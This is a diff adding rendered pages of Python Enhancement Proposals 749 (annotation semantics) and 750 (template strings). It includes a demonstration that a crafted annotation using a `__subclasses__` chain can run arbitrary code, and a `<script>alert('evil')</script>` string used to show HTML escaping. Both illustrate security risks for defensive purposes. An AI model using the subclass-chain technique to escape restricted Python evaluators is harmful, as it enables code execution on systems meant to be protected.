  • Ensure that the entry is never present in the class dictionary, or at least +never added by logic in the language core. This means that the descriptors +on type will always be used, without interference from the metaclass. +(Prototype in gh-120816.)
  • +
+

Alex Waygood suggested an implementation using the first approach. When a +heap type (such as a class created through the class statement) is created, +cls.__dict__["__annotations__"] is set to a special descriptor. +On __get__, the descriptor evaluates the annotations by calling __annotate__ +and returning the result. The annotations dictionary is cached within the +descriptor instance. The descriptor also behaves like a mapping, +so that code that uses cls.__dict__["__annotations__"] will still usually +work: treating the object as a mapping will evaluate the annotations and behave +as if the descriptor itself was the annotations dictionary. (Code that assumes +that cls.__dict__["__annotations__"] is specifically an instance of dict +may break, however.)

+

This approach is also straightforward to implement for __annotate__: this +attribute is already always set for classes with annotations, and we can set +it explicitly to None for classes without annotations.

+

While this approach would fix the known edge cases with metaclasses, it +introduces significant complexity to all classes, including a new built-in type +(for the annotations descriptor) with unusual behavior.

+

The alternative approach would be to never set __dict__["__annotations__"] +and use some other storage to store the cached annotations. This behavior +change would have to apply even to classes defined under +from __future__ import annotations, because otherwise there could be buggy +behavior if a class is defined without from __future__ import annotations +but its metaclass does have the future enabled. As PEP 649 previously noted, +removing __annotations__ from class dictionaries also has backwards compatibility +implications: cls.__dict__.get("__annotations__") is a common idiom to +retrieve annotations.

+

This approach would also mean that accessing .__annotations__ on an instance +of an annotated class no longer works. While this behavior is not documented, +it is a long-standing feature of Python and is relied upon by some users.

+
+
+
+

Adding the VALUE_WITH_FAKE_GLOBALS format

+

PEP 649 specifies:

+
+
This PEP assumes that +third-party libraries may implement their own __annotate__ +methods, and those functions would almost certainly work +incorrectly when run in this “fake globals” environment. +For that reason, this PEP allocates a flag on code objects, +one of the unused bits in co_flags, to mean “This code +object can be run in a ‘fake globals’ environment.” This +makes the “fake globals” environment strictly opt-in, and +it’s expected that only __annotate__ methods generated +by the Python compiler will set it.
+

However, this mechanism couples the implementation with +low-level details of the code object. The code object flags are +CPython-specific and the documentation explicitly warns +against relying on the values.

+

Larry Hastings suggested an alternative approach that does not +rely on code flags: a fourth format, VALUE_WITH_FAKE_GLOBALS. +Compiler-generated annotate functions would support only the +VALUE and VALUE_WITH_FAKE_GLOBALS formats, both of which are +implemented identically. The standard library would use the +VALUE_WITH_FAKE_GLOBALS format when invoking an annotate function +in one of the special “fake globals” environments.

+

This approach is useful as a forward-compatible mechanism for +adding new annotation formats in the future. Users who manually +write annotate functions should raise NotImplementedError if +the VALUE_WITH_FAKE_GLOBALS format is requested, so the standard +library will not call the manually written annotate function with +“fake globals”, which could have unpredictable results.

+
+

Specification

+

An additional format, FAKE_GLOBALS_VALUE, is added to the Format enum in the +annotationlib module, with value equal to 2. (As a result, the values of the +other formats will shift relative to PEP 649: FORWARDREF will be 3 and SOURCE +will be 4.)

+

Compiler-generated +annotate functions will support this format and return the same value as +they would return for the VALUE format. The standard library will pass +this format to the __annotate__ function when it is called in a “fake globals” +environment, as used to implement the FORWARDREF and SOURCE formats. +All public functions in the annotationlib module that accept a format +argument will raise NotImplementedError if the format is FAKE_GLOBALS_VALUE.

+

Third-party code that implements __annotate__ functions should raise +NotImplementedError if the FAKE_GLOBALS_VALUE format is passed +and the function is not prepared to be run in a “fake globals” environment. +This should be mentioned in the data model documentation for __annotate__.

+
+
+
+

Effect of deleting __annotations__

+

PEP 649 specifies:

+
+
Setting o.__annotations__ to a legal value +automatically sets o.__annotate__ to None.
+

However, the PEP does not say what happens if the __annotations__ attribute +is deleted (using del). It seems most consistent that deleting the attribute +will also delete __annotate__.

+
+

Specification

+

Deleting the __annotations__ attribute on functions, modules, and classes +results in setting __annotate__ to None.

+
+
+
+

Deferred evaluation of PEP 695 and 696 objects

+

Since PEP 649 was written, Python 3.12 and 3.13 gained support for +several new features that also use deferred evaluation, similar to the +behavior this PEP proposes for annotations:

+ +

Currently, these objects use deferred evaluation, but there is no direct +access to the function object used for deferred evaluation. To enable +the same kind of introspection that is now possible for annotations, we propose +to expose the internal function objects, allowing users to evaluate them +using the FORWARDREF and SOURCE formats.

+
+

Specification

+

We will add the following new attributes:

+ +

Except for evaluate_value, these attributes may be None if the object +does not have a bound, constraints, or default. Otherwise, the attribute is a +callable, similar to an __annotate__ function, that takes a single integer +argument and returns the evaluated value. Unlike __annotate__ functions, +these callables return a single value, not a dictionary of annotations. +These attributes are read-only.

+

Usually, users would use these attributes in combinations with +annotationlib.call_evaluate_function. For example, to get a TypeVar’s bound +in SOURCE format, one could write +annotationlib.call_evaluate_function(T.evaluate_bound, annotationlib.Format.SOURCE).

+
+
+
+

Behavior of dataclass field types

+

One consequence of the deferred evaluation of annotations is that +dataclasses can use forward references in their annotations:

+
>>> from dataclasses import dataclass
+>>> @dataclass
+... class D:
+...     x: undefined
+...
+
+
+

However, the FORWARDREF format leaks into the field types of the dataclass:

+
>>> fields(D)[0].type
+ForwardRef('undefined')
+
+
+

We considered a change where the .type attribute of a field object would +trigger evaluation of annotations, so that the field type could contain actual +values in the case of forward references that were defined after the dataclass +itself was created, but before the field type is accessed. +However, this would also mean that accessing .type could now run arbitrary +code in the annotation, and potentially throws errors such as NameError.

+

Therefore, we consider it more user-friendly to keep the ForwardRef object +in the type, and document that users who want to resolve forward references +can use the ForwardRef.evaluate method.

+

If use cases come up in the future, we could add additional functionality, +such as a new method that re-evaluates the annotation from scratch.

+
+
+

Renaming SOURCE to STRING

+

The SOURCE format is meant for tools that need to show a human-readable +format that is close to the original source code. However, we cannot retrieve +the original source in __annotate__ functions, and in some cases, we have +__annotate__ functions in Python code that do not have access to the original +code. For example, this applies to dataclasses.make_dataclass() +and the call-based syntax for typing.TypedDict.

+

This makes the name SOURCE a bit of a misnomer. The goal of the format +should indeed be to recreate the source, but the name is likely to mislead +users in practice. A more neutral name would emphasize that the format returns +an annotation dictionary with only strings. We suggest STRING.

+
+

Specification

+

The SOURCE format is renamed to STRING. To reiterate the changes in this +PEP, the four supported formats are now:

+
    +
  • VALUE: the default format, which evaluates the annotations and returns the +resulting values.
  • +
  • VALUE_WITH_FAKE_GLOBALS: for internal use; should be handled like VALUE +by annotate functions that support execution with fake globals.
  • +
  • FORWARDREF: replaces undefined names with ForwardRef objects.
  • +
  • STRING: returns strings, attempts to recreate code close to the original source.
  • +
+
+
+
+

Miscellaneous implementation details

+

PEP 649 goes into considerable detail on some aspects of the implementation. +To avoid confusion, we describe a few aspects where the current implementation +differs from that described in the PEP. However, these details are not guaranteed +to hold in the future, and they may change without notice in the future, unless +they are documented in the language reference.

+
+

Supported operations on ForwardRef objects

+

The SOURCE format is implemented by the “stringizer” technique, +where the globals dictionary of a function is augmented so that every +lookup results in a special object that can be used to reconstruct the +operations that are performed on the object.

+

PEP 649 specifies:

+
+
In practice, the “stringizer” functionality will be implemented +in the ForwardRef object currently defined in the +typing module. ForwardRef will be extended to +implement all stringizer functionality; it will also be +extended to support evaluating the string it contains, +to produce the real value (assuming all symbols referenced +are defined).
+

However, this is likely to lead to confusion in practice. An object +that implements stringizer functionality must implement almost all +special methods, including __getattr__ and __eq__, to return +a new stringizer. Such an object is confusing to work with: all operations +succeed, but they are likely to return different objects than the user +expects.

+

The current implementation instead implements only a few useful methods +on the ForwardRef class. During the evaluation of annotations, +an instance of a private stringizer class is used instead of ForwardRef. +After evaluation completes, the implementation of the FORWARDREF format +converts these internal objects into ForwardRef objects.

+
+
+

Signature of __annotate__ functions

+

PEP 649 specifies the signature of __annotate__ functions as:

+
+
__annotate__(format: int) -> dict
+

However, using format as a parameter name could lead to collisions +if an annotation uses a symbol named format. The parameter should be +positional-only and have a name that cannot be a legal identifier in order +to avoid this problem.

+

The current implementation uses the name .format with a leading +dot, but the exact name should be considered an implementation detail +and cannot be relied upon.

+

The documentation may still use the name format for simplicity.

+
+
+
+

Backwards Compatibility

+

PEP 649 provides a thorough discussion of the backwards compatibility implications +on existing code that uses either stock or PEP 563 semantics.

+

However, there is another set of compatibility problems: new code that is written +assuming PEP 649 semantics, but uses existing tools that eagerly evaluate annotations. +For example, consider a dataclass-like class decorator @annotator that retrieves the annotated +fields in the class it decorates, either by accessing __annotations__ directly +or by calling inspect.get_annotations().

+

Once PEP 649 is implemented, code like this will work fine:

+
class X:
+    y: Y
+
+class Y: pass
+
+
+

But this will not, unless @annotator is changed to use the new FORWARDREF +format:

+
@annotator
+class X:
+    y: Y
+
+class Y: pass
+
+
+

This is not strictly a backwards compatibility issue, since no previously working code +would break; before PEP 649, this code would have raised NameError at runtime. +In a sense, it is no different from any other new Python feature that needs +to be supported by third-party libraries. Nevertheless, it is a serious issue for libraries +that perform introspection, and it is important that we make it as easy as possible for +libraries to support the new semantics in a straightforward, user-friendly way.

+

We will update those parts of the standard library that are affected by this problem, +and we propose to add commonly useful functionality to the new annotationlib module, +so third-party tools can use the same set of tools.

+
+
+

Security Implications

+

None.

+
+
+

How to Teach This

+

The semantics of PEP 649, as modified by this PEP, should largely be intuitive for +users who add annotations to their code. We eliminate the need for manually adding +quotes around annotations that require forward references, a major source of confusion +for users.

+

For advanced users who need to introspect annotations, the story becomes more complex. +The documentation of the new annotationlib module will serve as a reference for users +who need to interact programmatically with annotations.

+
+
+

Reference Implementation

+

The in-progress PR #119891 +implements much of this PEP.

+
+
+

Open Issues

+

We may discover additional areas where PEP 649 needs clarification or amendment +as we make progress on implementing it. Readers are encouraged to follow the +CPython issue tracking the +implementation of the PEP and try out the draft implementation. Any feedback may +be incorporated into future versions of this PEP.

+
+
+

Acknowledgments

+

First of all, I thank Larry Hastings for writing PEP 649. This PEP modifies some of his +initial decisions, but the overall design is still his.

+

I thank Carl Meyer and Alex Waygood for feedback on early drafts of this PEP. Alex Waygood, +Alyssa Coghlan, and David Ellis provided insightful feedback and suggestions on the +interaction between metaclasses and __annotations__. Larry Hastings also provided useful +feedback on this PEP.

+
+
+

Appendix

+
+

Which expressions can be stringified?

+

PEP 649 acknowledges that the stringifier cannot handle all expressions. Now that we +have a draft implementation, we can be more precise about the expressions that can and +cannot be handled. Below is a list of all expressions in the Python AST that can and +cannot be recovered by the stringifier. The full list should probably not be added to +the documentation, but creating it is a useful exercise.

+

First, the stringifier of course cannot recover any information that is not present in +the compiled code, including comments, whitespace, parenthesization, and operations that +get simplified by the AST optimizer.

+

Second, the stringifier can intercept almost all operations that involve names looked +up in some scope, but it cannot intercept operations that operate fully on constants. +As a corollary, this also means it is not safe to request the SOURCE format on +untrusted code: Python is powerful enough that it is possible to achieve arbitrary +code execution even with no access to any globals or builtins. For example:

+
>>> def f(x: (1).__class__.__base__.__subclasses__()[-1].__init__.__builtins__["print"]("Hello world")): pass
+...
+>>> annotationlib.get_annotations(f, format=annotationlib.Format.SOURCE)
+Hello world
+{'x': 'None'}
+
+
+

(This particular example worked for me on the current implementation of a draft of this PEP; +the exact code may not keep working in the future.)

+

The following are supported (sometimes with caveats):

+
    +
  • BinOp
  • +
  • UnaryOp
      +
    • Invert (~), UAdd (+), and USub (-) are supported
    • +
    • Not (not) is not supported
    • +
    +
  • +
  • Dict (except when using ** unpacking)
  • +
  • Set
  • +
  • Compare
      +
    • Eq and NotEq are supported
    • +
    • Lt, LtE, Gt, and GtE are supported, but the operand may be flipped
    • +
    • Is, IsNot, In, and NotIn are not supported
    • +
    +
  • +
  • Call (except when using ** unpacking)
  • +
  • Constant (though not the exact representation of the constant; for example, escape +sequences in strings are lost; hexadecimal numbers are converted to decimal)
  • +
  • Attribute (assuming the value is not a constant)
  • +
  • Subscript (assuming the value is not a constant)
  • +
  • Starred (* unpacking)
  • +
  • Name
  • +
  • List
  • +
  • Tuple
  • +
  • Slice
  • +
+

The following are unsupported, but throw an informative error when encountered by the +stringifier:

+
    +
  • FormattedValue (f-strings; error is not detected if conversion specifiers like !r +are used)
  • +
  • JoinedStr (f-strings)
  • +
+

The following are unsupported and result in incorrect output:

+
    +
  • BoolOp (and and or)
  • +
  • IfExp
  • +
  • Lambda
  • +
  • ListComp
  • +
  • SetComp
  • +
  • DictComp
  • +
  • GeneratorExp
  • +
+

The following are disallowed in annotation scopes and therefore not relevant:

+
    +
  • NamedExpr (:=)
  • +
  • Await
  • +
  • Yield
  • +
  • YieldFrom
  • +
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0749.rst

+

Last modified: 2024-09-26 18:55:45 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0750/index.html b/pep-0750/index.html new file mode 100644 index 00000000000..09e7a93a382 --- /dev/null +++ b/pep-0750/index.html @@ -0,0 +1,1318 @@ + + + + + + + + PEP 750 – Template Strings | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 750 – Template Strings

+
+
Author:
+
Jim Baker <jim.baker at python.org>, +Guido van Rossum <guido at python.org>, +Paul Everitt <pauleveritt at me.com>, +Koudai Aono <koxudaxi at gmail.com>, +Lysandros Nikolaou <lisandrosnik at gmail.com>, +Dave Peck <davepeck at davepeck.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
08-Jul-2024
+
Python-Version:
+
3.14
+
Post-History:
+
09-Aug-2024, +17-Oct-2024, +21-Oct-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP introduces template strings for custom string processing.

+

Template strings are a generalization of f-strings, using a t in place of +the f prefix. Instead of evaluating to str, t-strings evaluate to a new +type, Template:

+
template: Template = t"Hello {name}"
+
+
+

Templates provide developers with access to the string and its interpolated +values before they are combined. This brings native flexible string +processing to the Python language and enables safety checks, web templating, +domain-specific languages, and more.

+
+
+

Relationship With Other PEPs

+

Python introduced f-strings in Python 3.6 with PEP 498. The grammar was +then formalized in PEP 701 which also lifted some restrictions. This PEP +is based on PEP 701.

+

At nearly the same time PEP 498 arrived, PEP 501 was written to provide +“i-strings” – that is, “interpolation template strings”. The PEP was +deferred pending further experience with f-strings. Work on this PEP was +resumed by a different author in March 2023, introducing “t-strings” as template +literal strings, and built atop PEP 701.

+

The authors of this PEP consider it to be a generalization and simplification +of the updated work in PEP 501. (That PEP has also recently been updated to +reflect the new ideas in this PEP.)

+
+
+

Motivation

+

Python f-strings are easy to use and very popular. Over time, however, developers +have encountered limitations that make them +unsuitable for certain use cases. +In particular, f-strings provide no way to intercept and transform interpolated +values before they are combined into a final string.

+

As a result, incautious use of f-strings can lead to security vulnerabilities. +For example, a user executing a SQL query with sqlite3 +may be tempted to use an f-string to embed values into their SQL expression, +which could lead to a SQL injection attack. +Or, a developer building HTML may include unescaped user input in the string, +leading to a cross-site scripting (XSS) +vulnerability.

+

More broadly, the inability to transform interpolated values before they are +combined into a final string limits the utility of f-strings in more complex +string processing tasks.

+

Template strings address these problems by providing +developers with access to the string and its interpolated values.

+

For example, imagine we want to generate some HTML. Using template strings, +we can define an html() function that allows us to automatically sanitize +content:

+
evil = "<script>alert('evil')</script>"
+template = t"<p>{evil}</p>"
+assert html(template) == "<p>&lt;script&gt;alert('evil')&lt;/script&gt;</p>"
+
+
+

Likewise, our hypothetical html() function can make it easy for developers +to add attributes to HTML elements using a dictionary:

+
attributes = {"src": "shrubbery.jpg", "alt": "looks nice"}
+template = t"<img {attributes} />"
+assert html(template) == '<img src="shrubbery.jpg" alt="looks nice" />'
+
+
+

Neither of these examples is possible with f-strings. By providing a +mechanism to intercept and transform interpolated values, template strings +enable a wide range of string processing use cases.

+
+
+

Specification

+
+

Template String Literals

+

This PEP introduces a new string prefix, t, to define template string literals. +These literals resolve to a new type, Template, found in a new top-level +standard library module, templatelib.

+

The following code creates a Template instance:

+
from templatelib import Template
+template = t"This is a template string."
+assert isinstance(template, Template)
+
+
+

Template string literals support the full syntax of PEP 701. This includes +the ability to nest template strings within interpolations, as well as the ability +to use all valid quote marks (', ", ''', and """). Like other string +prefixes, the t prefix must immediately precede the quote. Like f-strings, +both lowercase t and uppercase T prefixes are supported. Like +f-strings, t-strings may not be combined with the b or u prefixes. +Additionally, f-strings and t-strings cannot be combined, so the ft +prefix is invalid as well. t-strings may be combined with the r prefix; +see the Raw Template Strings section below for more information.

+
+
+

The Template Type

+

Template strings evaluate to an instance of a new type, templatelib.Template:

+
class Template:
+    args: Sequence[str | Interpolation]
+
+    def __init__(self, *args: str | Interpolation):
+        ...
+
+
+

The args attribute provides access to the string parts and +any interpolations in the literal:

+
name = "World"
+template = t"Hello {name}"
+assert isinstance(template.args[0], str)
+assert isinstance(template.args[1], Interpolation)
+assert template.args[0] == "Hello "
+assert template.args[1].value == "World"
+
+
+

See Interleaving of Template.args below for more information on how the +args attribute is structured.

+

The Template type is immutable. Template.args cannot be reassigned +or mutated.

+
+
+

The Interpolation Type

+

The Interpolation type represents an expression inside a template string. +Like Template, it is a new concrete type found in the templatelib module:

+
class Interpolation:
+    value: object
+    expr: str
+    conv: Literal["a", "r", "s"] | None
+    format_spec: str
+
+    __match_args__ = ("value", "expr", "conv", "format_spec")
+
+    def __init__(
+        self,
+        value: object,
+        expr: str,
+        conv: Literal["a", "r", "s"] | None = None,
+        format_spec: str = "",
+    ):
+        ...
+
+
+

Like Template, Interpolation is shallow immutable. Its attributes +cannot be reassigned.

+

The value attribute is the evaluated result of the interpolation:

+
name = "World"
+template = t"Hello {name}"
+assert template.args[1].value == "World"
+
+
+

The expr attribute is the original text of the interpolation:

+
name = "World"
+template = t"Hello {name}"
+assert template.args[1].expr == "name"
+
+
+

We expect that the expr attribute will not be used in most template processing +code. It is provided for completeness and for use in debugging and introspection. +See both the Common Patterns Seen in Processing Templates section and the +Examples section for more information on how to process template strings.

+

The conv attribute is the optional conversion +to be used, one of r, s, and a, corresponding to repr(), +str(), and ascii() conversions. As with f-strings, no other conversions +are supported:

+
name = "World"
+template = t"Hello {name!r}"
+assert template.args[1].conv == "r"
+
+
+

If no conversion is provided, conv is None.

+

The format_spec attribute is the format specification. +As with f-strings, this is an arbitrary string that defines how to present the value:

+
value = 42
+template = t"Value: {value:.2f}"
+assert template.args[1].format_spec == ".2f"
+
+
+

Format specifications in f-strings can themselves contain interpolations. This +is permitted in template strings as well; format_spec is set to the eagerly +evaluated result:

+
value = 42
+precision = 2
+template = t"Value: {value:.{precision}f}"
+assert template.args[1].format_spec == ".2f"
+
+
+

If no format specification is provided, format_spec defaults to an empty +string (""). This matches the format_spec parameter of Python’s +format() built-in.

+

Unlike f-strings, it is up to code that processes the template to determine how to +interpret the conv and format_spec attributes. +Such code is not required to use these attributes, but when present they should +be respected, and to the extent possible match the behavior of f-strings. +It would be surprising if, for example, a template string that uses {value:.2f} +did not round the value to two decimal places when processed.

+
+
+

Processing Template Strings

+

Developers can write arbitrary code to process template strings. For example, +the following function renders static parts of the template in lowercase and +interpolations in uppercase:

+
from templatelib import Template, Interpolation
+
+def lower_upper(template: Template) -> str:
+    """Render static parts lowercased and interpolations uppercased."""
+    parts: list[str] = []
+    for arg in template.args:
+        if isinstance(arg, Interpolation):
+            parts.append(str(arg.value).upper())
+        else:
+            parts.append(arg.lower())
+    return "".join(parts)
+
+name = "world"
+assert lower_upper(t"HELLO {name}") == "hello WORLD"
+
+
+

There is no requirement that template strings are processed in any particular +way. Code that processes templates has no obligation to return a string. +Template strings are a flexible, general-purpose feature.

+

See the Common Patterns Seen in Processing Templates section for more +information on how to process template strings. See the Examples section +for detailed working examples.

+
+
+

Template String Concatenation

+

Template strings support explicit concatenation using +. Concatenation is +supported for two Template instances as well as for a Template instance +and a str:

+
name = "World"
+template1 = t"Hello "
+template2 = t"{name}"
+assert template1 + template2 == t"Hello {name}"
+assert template1 + "!" == t"Hello !"
+assert "Hello " + template2 == t"Hello {name}"
+
+
+

Concatenation of templates is “viral”: the concatenation of a Template and +a str always results in a Template instance.

+

Python’s implicit concatenation syntax is also supported. The following code +will work as expected:

+
name = "World"
+template = t"Hello " "World"
+assert template == t"Hello World"
+template2 = t"Hello " t"World"
+assert template2 == t"Hello World"
+
+
+

The Template type implements the __add__() and __radd__() methods +roughly as follows:

+
class Template:
+    def __add__(self, other: object) -> Template:
+        if isinstance(other, str):
+            return Template(*self.args[:-1], self.args[-1] + other)
+        if not isinstance(other, Template):
+            return NotImplemented
+        return Template(*self.args[:-1], self.args[-1] + other.args[0], *other.args[1:])
+
+    def __radd__(self, other: object) -> Template:
+        if not isinstance(other, str):
+            return NotImplemented
+        return Template(other + self.args[0], *self.args[1:])
+
+
+

Special care is taken to ensure that the interleaving of str and Interpolation +instances is maintained when concatenating. (See the +Interleaving of Template.args section for more information.)

+
+
+

Template and Interpolation Equality

+

Two instances of Template are defined to be equal if their args attributes +contain the same strings and interpolations in the same order:

+
assert t"I love {stilton}" == t"I love {stilton}"
+assert t"I love {stilton}" != t"I love {roquefort}"
+assert t"I " + t"love {stilton}" == t"I love {stilton}"
+
+
+

The implementation of Template.__eq__() is roughly as follows:

+
class Template:
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, Template):
+            return NotImplemented
+        return self.args == other.args
+
+
+

Two instances of Interpolation are defined to be equal if their value, +expr, conv, and format_spec attributes are equal:

+
class Interpolation:
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, Interpolation):
+            return NotImplemented
+        return (
+            self.value == other.value
+            and self.expr == other.expr
+            and self.conv == other.conv
+            and self.format_spec == other.format_spec
+        )
+
+
+
+
+

No Support for Ordering

+

The Template and Interpolation types do not support ordering. This is +unlike all other string literal types in Python, which support lexicographic +ordering. Because interpolations can contain arbitrary values, there is no +natural ordering for them. As a result, neither the Template nor the +Interpolation type implements the standard comparison methods.

+
+
+

Support for the debug specifier (=)

+

The debug specifier, =, is supported in template strings and behaves similarly +to how it behaves in f-strings, though due to limitations of the implementation +there is a slight difference.

+

In particular, t'{expr=}' is treated as t'expr={expr}':

+
name = "World"
+template = t"Hello {name=}"
+assert template.args[0] == "Hello name="
+assert template.args[1].value == "World"
+
+
+
+
+

Raw Template Strings

+

Raw template strings are supported using the rt (or tr) prefix:

+
trade = 'shrubberies'
+t = rt'Did you say "{trade}"?\n'
+assert t.args[0] == r'Did you say "'
+assert t.args[2] == r'"?\n'
+
+
+

In this example, the \n is treated as two separate characters +(a backslash followed by ‘n’) rather than a newline character. This is +consistent with Python’s raw string behavior.

+

As with regular template strings, interpolations in raw template strings are +processed normally, allowing for the combination of raw string behavior and +dynamic content.

+
+
+

Interpolation Expression Evaluation

+

Expression evaluation for interpolations is the same as in PEP 498:

+
+
The expressions that are extracted from the string are evaluated in the context +where the template string appeared. This means the expression has full access to its +lexical scope, including local and global variables. Any valid Python expression +can be used, including function and method calls.
+

Template strings are evaluated eagerly from left to right, just like f-strings. This means that +interpolations are evaluated immediately when the template string is processed, not deferred +or wrapped in lambdas.

+
+
+

Exceptions

+

Exceptions raised in t-string literals are the same as those raised in f-string +literals.

+
+
+

Interleaving of Template.args

+

In the Template type, the args attribute is a sequence that will always +alternate between string literals and Interpolation instances. Specifically:

+
    +
  • Even-indexed elements (0, 2, 4, …) are always of type str, representing +the literal parts of the template.
  • +
  • Odd-indexed elements (1, 3, 5, …) are always Interpolation instances, +representing the interpolated expressions.
  • +
+

For example, the following assertions hold:

+
name = "World"
+template = t"Hello {name}"
+assert len(template.args) == 3
+assert template.args[0] == "Hello "
+assert template.args[1].value == "World"
+assert template.args[2] == ""
+
+
+

These rules imply that the args attribute will always have an odd length. +As a consequence, empty strings are added to the sequence when the template +begins or ends with an interpolation, or when two interpolations are adjacent:

+
a, b = "a", "b"
+template = t"{a}{b}"
+assert len(template.args) == 5
+assert template.args[0] == ""
+assert template.args[1].value == "a"
+assert template.args[2] == ""
+assert template.args[3].value == "b"
+assert template.args[4] == ""
+
+
+

Most template processing code will not care about this detail and will use +either structural pattern matching or isinstance() checks to distinguish +between the two types of elements in the sequence.

+

The detail exists because it allows for performance optimizations in template +processing code. For example, a template processor could cache the static parts +of the template and only reprocess the dynamic parts when the template is +evaluated with different values. Access to the static parts can be done with +template.args[::2].

+

Interleaving is an invariant maintained by the Template class. Developers can +take advantage of it but they are not required to themselves maintain it. +Specifically, Template.__init__() can be called with str and +Interpolation instances in any order; the constructor will “interleave” them +as necessary before assigning them to args.

+
+
+
+

Examples

+

All examples in this section of the PEP have fully tested reference implementations +available in the public pep750-examples +git repository.

+
+

Example: Implementing f-strings with t-strings

+

It is easy to “implement” f-strings using t-strings. That is, we can +write a function f(template: Template) -> str that processes a Template +in much the same way as an f-string literal, returning the same result:

+
name = "World"
+value = 42
+templated = t"Hello {name!r}, value: {value:.2f}"
+formatted = f"Hello {name!r}, value: {value:.2f}"
+assert f(templated) == formatted
+
+
+

The f() function supports both conversion specifiers like !r and format +specifiers like :.2f. The full code is fairly simple:

+
from templatelib import Template, Interpolation
+
+def convert(value: object, conv: Literal["a", "r", "s"] | None) -> object:
+    if conv == "a":
+        return ascii(value)
+    elif conv == "r":
+        return repr(value)
+    elif conv == "s":
+        return str(value)
+    return value
+
+
+def f(template: Template) -> str:
+    parts = []
+    for arg in template.args:
+        match arg:
+            case str() as s:
+                parts.append(s)
+            case Interpolation(value, _, conv, format_spec):
+                value = convert(value, conv)
+                value = format(value, format_spec)
+                parts.append(value)
+    return "".join(parts)
+
+
+
+

Note

+

Example code

+

See fstring.py and test_fstring.py.

+
+
+
+

Example: Structured Logging

+

Structured logging allows developers to log data in both a human-readable format +and a structured format (like JSON) using only a single logging call. This is +useful for log aggregation systems that process the structured format while +still allowing developers to easily read their logs.

+

We present two different approaches to implementing structured logging with +template strings.

+
+

Approach 1: Custom Log Messages

+

The Python Logging Cookbook +has a short section on how to implement structured logging.

+

The logging cookbook suggests creating a new “message” class, StructuredMessage, +that is constructed with a simple text message and a separate dictionary of values:

+
message = StructuredMessage("user action", {
+    "action": "traded",
+    "amount": 42,
+    "item": "shrubs"
+})
+logging.info(message)
+
+# Outputs:
+# user action >>> {"action": "traded", "amount": 42, "item": "shrubs"}
+
+
+

The StructuredMessage.__str__() method formats both the human-readable +message and the values, combining them into a final string. (See the +logging cookbook +for its full example.)

+

We can implement an improved version of StructuredMessage using template strings:

+
import json
+from templatelib import Interpolation, Template
+from typing import Mapping
+
+class TemplateMessage:
+    def __init__(self, template: Template) -> None:
+        self.template = template
+
+    @property
+    def message(self) -> str:
+        # Use the f() function from the previous example
+        return f(self.template)
+
+    @property
+    def values(self) -> Mapping[str, object]:
+        return {
+            arg.expr: arg.value
+            for arg in self.template.args
+            if isinstance(arg, Interpolation)
+        }
+
+    def __str__(self) -> str:
+        return f"{self.message} >>> {json.dumps(self.values)}"
+
+_ = TemplateMessage  # optional, to improve readability
+action, amount, item = "traded", 42, "shrubs"
+logging.info(_(t"User {action}: {amount:.2f} {item}"))
+
+# Outputs:
+# User traded: 42.00 shrubs >>> {"action": "traded", "amount": 42, "item": "shrubs"}
+
+
+

Template strings give us a more elegant way to define the custom message +class. With template strings it is no longer necessary for developers to make +sure that their format string and values dictionary are kept in sync; a single +template string literal is all that is needed. The TemplateMessage +implementation can automatically extract structured keys and values from +the Interpolation.expr and Interpolation.value attributes, respectively.

+
+
+

Approach 2: Custom Formatters

+

Custom messages are a reasonable approach to structured logging but can be a +little awkward. To use them, developers must wrap every log message they write +in a custom class. This can be easy to forget.

+

An alternative approach is to define custom logging.Formatter classes. This +approach is more flexible and allows for more control over the final output. In +particular, it’s possible to take a single template string and output it in +multiple formats (human-readable and JSON) to separate log streams.

+

We define two simple formatters, a MessageFormatter for human-readable output +and a ValuesFormatter for JSON output:

+
import json
+from logging import Formatter, LogRecord
+from templatelib import Interpolation, Template
+from typing import Any, Mapping
+
+
+class MessageFormatter(Formatter):
+    def message(self, template: Template) -> str:
+        # Use the f() function from the previous example
+        return f(template)
+
+    def format(self, record: LogRecord) -> str:
+        msg = record.msg
+        if not isinstance(msg, Template):
+            return super().format(record)
+        return self.message(msg)
+
+
+class ValuesFormatter(Formatter):
+    def values(self, template: Template) -> Mapping[str, Any]:
+        return {
+            arg.expr: arg.value
+            for arg in template.args
+            if isinstance(arg, Interpolation)
+        }
+
+    def format(self, record: LogRecord) -> str:
+        msg = record.msg
+        if not isinstance(msg, Template):
+            return super().format(record)
+        return json.dumps(self.values(msg))
+
+
+

We can then use these formatters when configuring our logger:

+
import logging
+import sys
+
+logger = logging.getLogger(__name__)
+message_handler = logging.StreamHandler(sys.stdout)
+message_handler.setFormatter(MessageFormatter())
+logger.addHandler(message_handler)
+
+values_handler = logging.StreamHandler(sys.stderr)
+values_handler.setFormatter(ValuesFormatter())
+logger.addHandler(values_handler)
+
+action, amount, item = "traded", 42, "shrubs"
+logger.info(t"User {action}: {amount:.2f} {item}")
+
+# Outputs to sys.stdout:
+# User traded: 42.00 shrubs
+
+# At the same time, outputs to sys.stderr:
+# {"action": "traded", "amount": 42, "item": "shrubs"}
+
+
+

This approach has a couple advantages over the custom message approach to structured +logging:

+
    +
  • Developers can log a t-string directly without wrapping it in a custom class.
  • +
  • Human-readable and structured output can be sent to separate log streams. This +is useful for log aggregation systems that process structured data independently +from human-readable data.
  • +
+
+

Note

+

Example code

+

See logging.py and test_logging.py.

+
+
+
+
+

Example: HTML Templating

+

This PEP contains several short HTML templating examples. It turns out that the +“hypothetical” html() function mentioned in the Motivation section +(and a few other places in this PEP) exists and is available in the +pep750-examples repository. +If you’re thinking about parsing a complex grammar with template strings, we +hope you’ll find it useful.

+
+
+
+

Backwards Compatibility

+

Like f-strings, use of template strings will be a syntactic backwards incompatibility +with previous versions.

+
+
+

Security Implications

+

The security implications of working with template strings, with respect to +interpolations, are as follows:

+
    +
  1. Scope lookup is the same as f-strings (lexical scope). This model has been +shown to work well in practice.
  2. +
  3. Code that processes Template instances can ensure that any interpolations +are processed in a safe fashion, including respecting the context in which +they appear.
  4. +
+
